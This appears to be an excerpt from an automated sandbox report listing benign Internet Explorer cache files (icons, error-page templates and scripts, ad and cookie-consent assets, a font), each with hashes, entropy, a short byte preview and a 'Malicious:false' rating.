                                        SHA1:1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
                                        SHA-256:70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
                                        SHA-512:8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx.eSMHTQ...7.o.8#3.0....M.BPJDi..*.E..h.A...6..0.Z$..i.A...B....H0*.rl..F.y:?...9O..^......=.J..h..M]f>.I...d...V.D..@....T..5`......@..PK.t6....#,.....o&.U*.lJ @...4S.J$..&......%v.B.w.Fc......'B...7...B..0..#z..J..>r.F.Ch..(.U&.\..O.s+..,]Z..w..s.>.I_.......U$D..CP.<....].\w..4..~...Q....._...h...L......X.{i... {..&.w.:.....$.W.....W..."..S.pu..').=2.C#X..D.........}.$..H.F}.f...8...s..:.....2..S.LL..'&.g.....j.#....oH..EhG'...`.p..Ei...D...T.fP.m3.CwD).q.........x....?..+..2....wPyW...j........$..1........!W*u*e"..Q.N#.q..kg...%`w.-.o..z..CO.k.....&..g..@{..k.J._...)X..4)x...ra.#....i._1...f..j...2..&.J.^. .@$.`0N.t.......D.....iL...d/.|Or.L._...;a..Y.]i.._J....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\BBkwUr[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):436
                                        Entropy (8bit):7.255906495097201
                                        Encrypted:false
                                        SSDEEP:6:6v/lhPahm/BBjoPHhOVDqpp05cMxyHtGUmmozY7JE3R+hRMCzRPasXQc01UaVesl:6v/7MHQg25b8Ht3VEMNQ2w5
                                        MD5:01B5E74F991A886215461BF0057008C7
                                        SHA1:6A7347C3559814722D7AA4D491A0D754E157FCC5
                                        SHA-256:DB8A0C0A44AEE824F689A942D99802F95D7950758CB0739C7F179624A592CD51
                                        SHA-512:17820A7C90B35B0E45D0A07F5445D8C97BFD3098FD9E0F0283CD6CFC1DB2B33C651924D2F04EF398C147CEB8D7DEA3F591DBC19F9039279407C4E4231AC5F5B7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+.....fIDATx.}..M.@.......0...Aa.......#0..."..0....a....<....<....y..qS......m..k..%.'|.......`....Z.`x...X............Np..x........a%(..ab........=.....j.[....0}.>.O..R~..<@y....nV..:.q.....G.P.e..............?s....i^l.P..5.0....?...&.A.K..|+...X.h)....5K...Zx...[....G...0N<.~PC.@.X.O2..N..x...:?..7.xH.&.......C3..8....Q.*.>...W..~..].U..U>L/....Le&.......IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\NewErrorPageTemplate[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1612
                                        Entropy (8bit):4.869554560514657
                                        Encrypted:false
                                        SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                        MD5:DFEABDE84792228093A5A270352395B6
                                        SHA1:E41258C9576721025926326F76063C2305586F76
                                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\NewErrorPageTemplate[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1612
                                        Entropy (8bit):4.869554560514657
                                        Encrypted:false
                                        SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                        MD5:DFEABDE84792228093A5A270352395B6
                                        SHA1:E41258C9576721025926326F76063C2305586F76
                                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\dnserror[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\dnserror[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\down[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):748
                                        Entropy (8bit):7.249606135668305
                                        Encrypted:false
                                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                        MD5:C4F558C4C8B56858F15C09037CD6625A
                                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\errorPageStrings[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):5.164796203267696
                                        Encrypted:false
                                        SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                        MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                        SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                        SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                        SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\httpErrorPagesScripts[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):12105
                                        Entropy (8bit):5.451485481468043
                                        Encrypted:false
                                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                        MD5:9234071287E637F85D721463C488704C
                                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\log[1].gif
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:GIF image data, version 89a, 1 x 1
                                        Category:dropped
                                        Size (bytes):35
                                        Entropy (8bit):3.081640248790488
                                        Encrypted:false
                                        SSDEEP:3:CUnl/RCXknEn:/wknEn
                                        MD5:349909CE1E0BC971D452284590236B09
                                        SHA1:ADFC01F8A9DE68B9B27E6F98A68737C162167066
                                        SHA-256:796C46EC10BC9105545F6F90D51593921B69956BD9087EB72BEE83F40AD86F90
                                        SHA-512:18115C1109E5F6B67954A5FF697E33C57F749EF877D51AA01A669A218B73B479CFE4A4942E65E3A9C3E28AE6D8A467D07D137D47ECE072881001CA5F5736B9CC
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: GIF89a.............,........@..L..;
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\nrrV27452[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):90611
                                        Entropy (8bit):5.421500848741912
                                        Encrypted:false
                                        SSDEEP:1536:uEuukXGs7RiUGZFVgRdillux5Q3Yzudp9o9uvby3TdXPH6viqQDkjs2i:atiX0di3p8urMfHgjg
                                        MD5:1EB648466B92897E80D5F3A64D02C011
                                        SHA1:624EE532FED7CCBC60DF3433DC3369AADE0F9226
                                        SHA-256:1C9605652D3D876ACA145E7F46F92E669E6A92C4AB27A1CBB454882BD58A1386
                                        SHA-512:1B7CEED799A6994991DCB8938A3B00BD64E1CEC17EC0775FC1CE844604805FEB20BEC3D72823730712BD0CB45B278F30FDD2CBA7319AD605323F667F39BF801C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},t={},n={},a={},d={},c={},l={};function g(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=g("conversionpixelcontroller"),e=g("browserhinter"),o=g("kwdClickTargetModifier"),i=g("hover"),t=g("mraidDelayedLogging"),n=g("macrokeywords"),a=g("tcfdatamanager"),d=g("l3-reporting-observer-adapter"),c=g("editorial_blocking"),l=g("debuglogs"),{conversionPixelCo
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\otFlat[2].json
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):12282
                                        Entropy (8bit):5.246783630735545
                                        Encrypted:false
                                        SSDEEP:192:SZ1Nfybp4gtNs5FYdGDaRBYw6Q3OEB+q5OdjM/w4lYLp5bMqEb5PenUpoQuQJYQj:WNejbnNP85csXfn/BoH6iAHyPtJJAk
                                        MD5:A7049025D23AEC458F406F190D31D68C
                                        SHA1:450BC57E9C44FB45AD7DC826EB523E85B9E05944
                                        SHA-256:101077328E77440ADEE7E27FC9A0A78DEB3EA880426DFFFDA70237CE413388A5
                                        SHA-512:EFBEFAF0D02828F7DBD070317BFDF442CAE516011D596319AE0AF90FC4C4BD9FF945AB6E6E0FF9C737D54E05855414386492D95ABFC610E7DE2E99725CB1A906
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCIgcm9sZT0iZGlhbG9nIiBhcmlhLWRlc2NyaWJlZGJ5PSJvbmV0cnVzdC1wb2xpY3ktdGV4dCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGl0bGU8L2gzPjxwIGlkPSJvbmV0cnVzdC1wb2xpY3ktdGV4dCI+dGl0bGU8L3A+PGRpdiBjbGFzcz0ib3QtZHBkLWNvbnRhaW5lciI+PGgzIGNsYXNzPSJvdC1kcGQtdGl0bGUiPldlIGNvbGxlY3QgZGF0YSBpbiBvcmRlciB0byBwcm92aWRlOjwvaDM+PGRpdiBjbGFzcz0ib3QtZHBkLWNvbnRlbnQiPjxwIGNsYXNzPSJvdC1kcGQtZGVzYyI+ZGVzY3JpcHRpb248L3A+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtYnV0dG9uLWdyb3VwLXBhcmVudCIgY2xhc3M9Im90LXNkay10aHJlZSBvdC1zZGstY29sdW1ucyI+PGRpdiBpZD0ib25ldHJ1c3QtYnV0dG9uLWdyb3VwIj48YnV0dG9uIGlkPSJvbmV0cnVzdC1wYy1idG4taGFuZGxlciI+Y2h
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\otPcCenter[2].json
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):47714
                                        Entropy (8bit):5.565687858735718
                                        Encrypted:false
                                        SSDEEP:768:4zg/3JXE9ZSqN76pW1lzZzic18+JHoQthI:4zCBceUdZzic18+5xI
                                        MD5:8EC5B25A65A667DB4AC3872793B7ACD2
                                        SHA1:6B67117F21B0EF4B08FE81EF482B888396BBB805
                                        SHA-256:F6744A2452B9B3C019786704163C9E6B3C04F3677A7251751AEFD4E6A556B988
                                        SHA-512:1EDC5702B55E20F5257B23BCFCC5728C4FD0DEB194D4AADA577EE0A6254F3A99B6D1AEDAAAC7064841BDE5EE8164578CC98F63B188C1A284E81594BCC0F20868
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJvdC1wYy10aXRsZSI+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBjbGFzcz0ib3QtcGMtaGVhZGVyIj48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWxsb3cgYWxsPC9idXR0b24+PHNlY3Rpb24gY2xhc3M9Im90LXNkay1yb3cgb3QtY2F0LWdycCI+PGgzIGlkPSJvdC1jYXRlZ29yeS10aXRsZSI+TWFuYWdlIENvb2tpZSBQcmVmZXJlbmNlczwvaDM+PGRpdiBjbGFzcz0ib3QtcGxpLWhkciI+PHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5Db25zZW50PC9
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\4996b9[2].woff
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                        Category:dropped
                                        Size (bytes):45633
                                        Entropy (8bit):6.523183274214988
                                        Encrypted:false
                                        SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                        MD5:A92232F513DC07C229DDFA3DE4979FBA
                                        SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                        SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                        SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... .*...........I.A_.<........... ........d.*.......................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAKFpl8[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):585
                                        Entropy (8bit):7.555901519493306
                                        Encrypted:false
                                        SSDEEP:12:6v/7Zllj1AmzyaeU1glVfGHTT3H7LhChpt+ZnRE5b3Bz7Mf0Vg:S31hzm1GHTDbL0hpt+rE5bBY0Vg
                                        MD5:C423DAB40DA77CC7C42AF3324BFF1167
                                        SHA1:230F1E5C08932053C9EE8B169C533505C6CA5542
                                        SHA-256:3441B798B60989CF491AE286039CA4356D26E87F434C33DE47DC67C68E519E4B
                                        SHA-512:771F92666BE855C5692860F42EDB2E721E051AC1DC07FE7F1A228416375F196B444D82F76659FFF9877FD2483B26D1D6B64615803CA612BC9475BA3EE82A9E0D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .PNG........IHDR................a....pHYs..........+......IDATx..S=O.P.=..h....."..*.....Tu..a...*F..,.....R.....K.........$V.!.c.....F.e..{.y.{.L..J..s..=>...2.M.2|:..4,"...ag2(7"d..>...7.xA..~m. .....07ZP....6.|X\}.+`.?....~^.....A...p.6N.......`...*z......S.].h3.J....~..t...T.4c..{..P|b.....C..l.y........D.....6.@o.!........".}.a....B.+.....n...Z...+.8..z.._.qr..c.....J.R.[./u.KYO.RZ....X#S.-..G#..vR..S.4C ...w..HT3}|...y.?.[....R..&1."u......e..j..b/..=S../..'.T.!.~..u.....xQ.U..q.&...M........lH.W.D.aC....}.1...@.h...\.br..k........zar.....IEND.B`.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\AAOfFRV[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                        Category:dropped
                                        Size (bytes):2754
                                        Entropy (8bit):7.844425834747859
                                        Encrypted:false
                                        SSDEEP:48:QfAuETA+wjpk5kCLsIZDP21yDvkDHCIY1x3pf7nM4kR1izuW3keUpEpso:Qf7EElWkCLjP21yADHCtx3pfyREj3kUN
                                        MD5:C830ED87471EDAE5A549A8374D0E44AA
                                        SHA1:ECCD1AD8688D25F74D6F9CDDEB938D0316DC5672
                                        SHA-256:D565D9A2812A5FF3057ECD3F8450174294FE18A604B5174B6808CFFFFE49155C
                                        SHA-512:4B72FC23FE713F9BD21E4B8077F99AAAE969749FF4DDA41B1C411E32D9F50C50B2B7141D82D5C305E1C181813FD3FA68E2E54402D3CAA3D9D14269528F97D2FD
                                        Malicious:false
                                        Reputation:unknown
